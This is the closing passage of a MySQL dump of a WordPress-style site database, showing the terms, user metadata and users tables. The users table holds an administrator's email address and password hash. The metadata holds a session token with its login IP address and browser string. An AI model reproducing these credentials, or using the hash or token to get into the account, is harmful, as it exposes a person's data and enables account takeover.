/*!40000 ALTER TABLE `wm_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wm_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_terms`
--

DROP TABLE IF EXISTS `wm_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_terms`
--

LOCK TABLES `wm_terms` WRITE;
/*!40000 ALTER TABLE `wm_terms` DISABLE KEYS */;
INSERT INTO `wm_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'News &amp; Event','news-and-event',0),(3,'Promo of The Month','promo-of-the-month',0),(9,'Art','art',0),(10,'Awesome','awesome',0),(11,'Cars','cars',0),(12,'Classic','classic',0),(13,'Custom','custom',0),(14,'Data','data',0),(15,'Epic','epic',0),(16,'Funny','funny',0),(17,'Gaming Tips','gaming-tips',0),(18,'Music','music',0),(19,'Photography','photography',0),(20,'Standard','standard',0),(21,'ThemeNectar','themenectar',0),(22,'Videos','videos',0),(23,'Wordpress','wordpress',0),(24,'Main Nav','main-nav',0),(25,'Link','post-format-link',0),(26,'Video','post-format-video',0),(27,'Quote','post-format-quote',0),(28,'New Nav','new-nav',0);
/*!40000 ALTER TABLE `wm_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_usermeta`
--

DROP TABLE IF EXISTS `wm_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_usermeta`
--

LOCK TABLES `wm_usermeta` WRITE;
/*!40000 ALTER TABLE `wm_usermeta` DISABLE KEYS */;
INSERT INTO `wm_usermeta` VALUES (1,1,'nickname','null'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wm_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wm_user_level','10'),(14,1,'dismissed_wp_pointers','vc_pointers_backend_editor'),(15,1,'show_welcome_panel','1'),(17,1,'wm_dashboard_quick_press_last_post_id','6668'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:10:\"139.0.65.0\";}'),(19,1,'nav_menu_recently_edited','28'),(20,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(21,1,'metaboxhidden_nav-menus','a:6:{i:0;s:25:\"add-post-type-home_slider\";i:1;s:23:\"add-post-type-portfolio\";i:2;s:12:\"add-post_tag\";i:3;s:15:\"add-post_format\";i:4;s:16:\"add-project-type\";i:5;s:22:\"add-project-attributes\";}'),(22,1,'wm_user-settings','editor=tinymce&edit_element_vcUIPanelWidth=650&edit_element_vcUIPanelLeft=262px&edit_element_vcUIPanelTop=42px&libraryContent=browse'),(23,1,'wm_user-settings-time','1515647095'),(24,1,'closedpostboxes_page','a:0:{}'),(25,1,'metaboxhidden_page','a:5:{i:0;s:32:\"nectar-metabox-portfolio-display\";i:1;s:10:\"postcustom\";i:2;s:16:\"commentstatusdiv\";i:3;s:7:\"slugdiv\";i:4;s:9:\"authordiv\";}'),(28,1,'session_tokens','a:1:{s:64:\"934e3b16c12cf11366a7595433e1b9e2bdd69cc08dcc96c31cf382096fc7f271\";a:4:{s:10:\"expiration\";i:1517406874;s:2:\"ip\";s:12:\"139.0.65.203\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:5:\"login\";i:1517234074;}}');
/*!40000 ALTER TABLE `wm_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_users`
--

DROP TABLE IF EXISTS `wm_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_users`
--

LOCK TABLES `wm_users` WRITE;
/*!40000 ALTER TABLE `wm_users` DISABLE KEYS */;
INSERT INTO `wm_users` VALUES (1,'null','$P$B6zN.YQN8MK6MMEOIbPGRcfgdKRIcx.','null','donny@futuremediatrix.com','','2017-12-09 18:44:57','',0,'null');
/*!40000 ALTER TABLE `wm_users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-07-03  4:53:23
